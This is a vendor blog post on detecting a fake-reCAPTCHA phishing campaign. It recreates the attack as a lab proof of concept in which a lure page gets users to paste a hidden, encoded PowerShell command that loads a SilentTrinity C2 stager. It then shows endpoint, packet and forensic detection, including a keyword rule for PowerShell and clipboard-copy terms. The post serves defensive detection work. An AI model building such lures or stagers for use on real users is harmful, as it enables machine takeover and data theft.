Using NetWitness to Detect Phishing reCAPTCHA Campaign
Author: Mohamed Osama, Senior Consultant Incident Response, NetWitness
Introduction
Recently, a sophisticated phishing campaign mimicking reCAPTCHA technology, which stands for Completely Automated Public Turing test to tell Computers and Humans Apart, has been targeting unsuspecting employees across various sectors.
The campaign capitalizes on social engineering techniques, tricking victims into bypassing security measures by convincing them to paste malicious code into their systems. Using the familiar and trusted reCAPTCHA interface, attackers can lure employees into believing that they are merely verifying their identity to access legitimate websites or services, while in reality, they are inadvertently initiating a harmful process that compromises their machine.
Once the malicious code is executed, it installs an infostealer malware designed to siphon sensitive information from the infected device. This malware also establishes a backdoor, allowing attackers to remotely control the system through a Command-and-Control (C2) server. The lack of cybersecurity awareness among many employees has made this campaign particularly effective, as the phishing webpage appears authentic and exploits the perceived security of reCAPTCHA. This attack highlights the critical need for enhanced employee training and awareness to defend against evolving cyber threats.
The current campaign is leveraging multiple redirections over different websites, which finally ends with the reCAPTCHA web page. It usually consists of a landing HTML page with embedded encoded mshta or PowerShell command line arguments for downloading and invoking the malicious code respectively. In addition, it has been observed that mshta, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files, was also abused for downloading compressed ZIP files that eventually decompress and execute the infostealers on the compromised machine.
This campaign has been tracked by NetWitness Incident Response team, among other vendors as well. It is known to install infostealer malware, specifically Lumma Stealer however, in this blog post, I will leverage a stealthier file-less approach that directly leads to Command-and-Control (C2) and a complete takeover of the compromised machine by the threat actor.
Figure 1: Attack Diagram
Tool
The fake reCAPTCHA code has been publicly available on GitHub for many years as of the time of this blog. I used a publicly available reCAPTCHA GitHub repository where the available code leverages an index.html landing web page that mimics the reCAPTCHA format, with additional instructions to paste a specific line, which looks innocent enough to lure the user into completing the verification process.
Figure 2: Full view of fake reCAPTCHA web page
The available reCAPTCHA code, totally created for PoC purposes, is analyzed as per below.
Figure 3: Analysis of index.html
Figure 4: Analysis of recaptcha-verify.html
In this blog, I will only leverage the landing page, index.html, to execute a PowerShell command for downloading and invoking a malicious C2 Stager into a hidden spawned PowerShell process. The C2 chosen is SilentTrinity, which was covered in detail in another blog post. This is just another PoC where a fileless technique can be leveraged to directly initiate a C2 communication with the threat actor, evading the detection of multiple EPP (Endpoint Protection Platform) and EDR (Endpoint Detection and Response) solutions.
The Attack
The attack unfolds as per below cyber kill chain.
Figure 5: Cyber kill chain
The weaponization stage includes the attacker crafting a fake reCAPTCHA index.html code through hardcoding a Base64 encoded PowerShell command, which downloads the SilentTrinity C2 stager.ps1 script and injects it in the memory of a hidden spawned PowerShell running process. Afterwards, the attacker creates suspicious websites redirecting to the malicious reCAPTCHA landing web page.
Figure 6: Customized index.html
The delivery method is favored by the attacker to be a phishing email tricking the user into clicking an inserted hyperlink towards the suspicious websites, thus assuring that the user will be prompted with the fake reCAPTCHA page.
The reCAPTCHA web page will appear normal to untrained eyes where it will instruct the user to paste some content into the Run prompt of the machine. We can also notice that the entered phrase looks typical to the one in the instructions.
Figure 7: reCAPTCHA verification steps
Figure 8: Run prompt with reCAPTCHA lure message
However, scrolling backwards in the entered phrase shows the actual command preceding the lure verification message.
Figure 9: Hidden command preceding lure message
Once the user clicks OK, the C2 implant will be loaded and initiates a stealthy communication and beaconing with the C2 server.
Figure 10: C2 stager pulled from C2 attack server
Figure 11: PowerShell checking in with C2 attack server
At this point, the threat actor acquired full remote control over this compromised machine, where some local system enumeration commands are fired however, the attack’s magnitude can vary depending on the level damage and impact the threat actor can induce on such compromised machine and corresponding corporate network.
Figure 12: System enumeration commands executed
The Detection Using Endpoint Telemetry Data
From NetWitness Endpoint perspective and during frequent hunting activities, the analyst observed multiple behaviors of compromise (BOC) generated pointing to peculiar PowerShell executed.
Figure 13: NetWitness Investigate page highlighting anomalous PowerShell activity
The analyst thoroughly checked the command line arguments and discovered multiple attempts to execute a PowerShell process with encoded command leveraging the below flags:
- -nop: Does not load the Windows PowerShell profile
- -w hidden: WindowStyle set to be hidden
- -ep bypass: Temporarily bypass the execution policy and run scripts in a single PowerShell session
- -ec: Accepts a base-64-encoded string version of a command.
The analyst also notices a reCAPTCHA verification message following the executed commands.
Figure 14: Command line arguments executed by PowerShell
Focusing the analysis on spawned PowerShell processes leads to the discovery of multiple generated MITRE ATT&CK and NetWitness alerts.
Figure 15: MITRE ATT&CK and NetWitness alerts generated
The analysis continues to uncover PowerShell process map, where its parent process is identified to be explorer.exe, a native Microsoft Windows corresponding to Windows GUI shell. NetWitness process map points out multiple child processes spawned by PowerShell, such as whoami and netstat.
Figure 16: PowerShell process map
Note
As I did not utilize the second web page (reCAPTCHA-verify) of the used PoC in this attack scenario, it is not highlighted in the previous detection section. However, leveraging another web page or even mshta to download malicious content on the victimized machine would be easily detected through the following Behavior of Compromise (BOC) populated values.
boc = ‘lolbas initiates network connections’,’mshta runs powershell’
Figure 17: Suspicious mshta activity
Figure 18: Command line argument executed by mshta
Figure 19: Generated BOCs for mshta running PowerShell
The Detection Using Packet Data
As the analysis continues, the analyst shifts the investigation towards the packet perspective, where the analyst discovers multiple anomalous HTTP protocol characteristics populating values under meta key analysis.service. This is coupled with alarming MITRE ATT&CK techniques and tactics, along with non-standard TCP ports used in the communication.
Figure 20: Peculiar HTTP communication over non-standard ports
The analyst took a deeper dive inside this communication, where hardcoded PowerShell command is discovered within an HTML file representing the server’s response.
Figure 21: Raw packet analysis showing encoded PowerShell command
The analyst reconstructed the raw packet in its original form, a web page, and it was clearly a loaded reCAPTCHA page holding some strange instructions to follow.
Figure 22: reCAPTCHA web page reconstructed by NetWitness
Following the logical investigation stream, the analyst focused the analysis on all the communication between the possibly compromised machine and the anomalous web server simulating a reCAPTCHA web page. Accordingly, other indicators are surfaced leading to the discovery of SilentTrinity C2 as in below.
Figure 23: SilentTrinity IOCs generated by NetWitness
Figure 24: C2 stager GET request by the victim machine
Figure 25: C2 Beaconing and Communication
Note
For building up a detection rule to trigger upon the discovery of plaintext keywords within a raw packet (ex: HTML page), NetWitness Search Pattern rule can be easily leveraged. However, if NetWitness Packets is on version 12.3 or earlier, then a possible workaround is to leverage the built-in native SEARCH parser, which can be enabled from NetWitness Decoder config page, it loads its configuration from search.ini file under the same config page of the decoder.
Figure 26: Native SEARCH parser
The below lines can be added to search.ini file as in below.
[reCAPTCHA_Detected]
Services=80;8080;8000
Keywords= reCAPTCHA ;Captcha ;textToCopy ;copy ;commandToRun ;powershell
Case=0
[execCommand_JavaScript_Method_Detected]
Services=80;8080;8000
Keywords= document.execCommand
Case=0
Figure 27: Customized search.ini file
The logic of the above configuration lines is to look for specific keywords, such as document.execCommand (JavaScript method) among other keywords, which would be possibly alarming if discovered. Decoder’s parsers need to be reloaded afterwards, from Decoder’s explore page.
Figure 28: Parser's reload signal
Afterwards, an Application rule can be created to alert on Indicators of Compromise (IOC) meta key.
Figure 29: reCAPTCHA Application rule condition
At this point, if a raw packet is exposing keywords as configured, NetWitness would alert as below.
Figure 30: reCAPTCHA application rule triggered
Investigation
At this moment of the analysis, the analyst should be able to quickly triage the compromised machine. Multiple approaches can be applied. One of the most optimal ones is to analyze the RunMRU (Run Most Recently Used) registry hive, which is populated when a user enters a command into the START > Run prompt. Entries will be logged in the user hive under this path.
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Based on the below collected artifact, the analyst identifies an encoded PowerShell command executed in the Run prompt of this specific user. This confirmed that the victimized user followed the reCAPTCHA malicious instructions.
Figure 31: Analysis of RunMRU registry hive
Accordingly, another approach that could be extremely useful during lite forensics phase is to acquire the PowerShell’s process memory and pinpoint injected malicious code.
Figure 32: PowerShell memory dump analysis showing executed command
Figure 33: Whoami command captured in the analyzed PowerShell process memory
Figure 34: Abstract of the injected C2 PowerShell script into the process' memory
Conclusion
Cybersecurity awareness is a fundamental component of an organization's security posture, as even the most robust technical defenses can be undermined by an uninformed employee making a simple mistake. Innocent actions, such as clicking on a phishing link or unknowingly executing malicious code from a fake reCAPTCHA page, can lead to critical breaches, allowing attackers to bypass security controls and infiltrate the network. This underscores the importance of continuous security training for all staff, combined with the implementation of advanced detection and response technologies like Network Detection and Response (NDR), Endpoint Detection and Response (EDR), and Security Information and Event Management (SIEM). These technologies work together to monitor and detect suspicious activity, provide visibility across the network, and enable swift incident response, ensuring that human error is mitigated by layered defenses and proactive security measures.
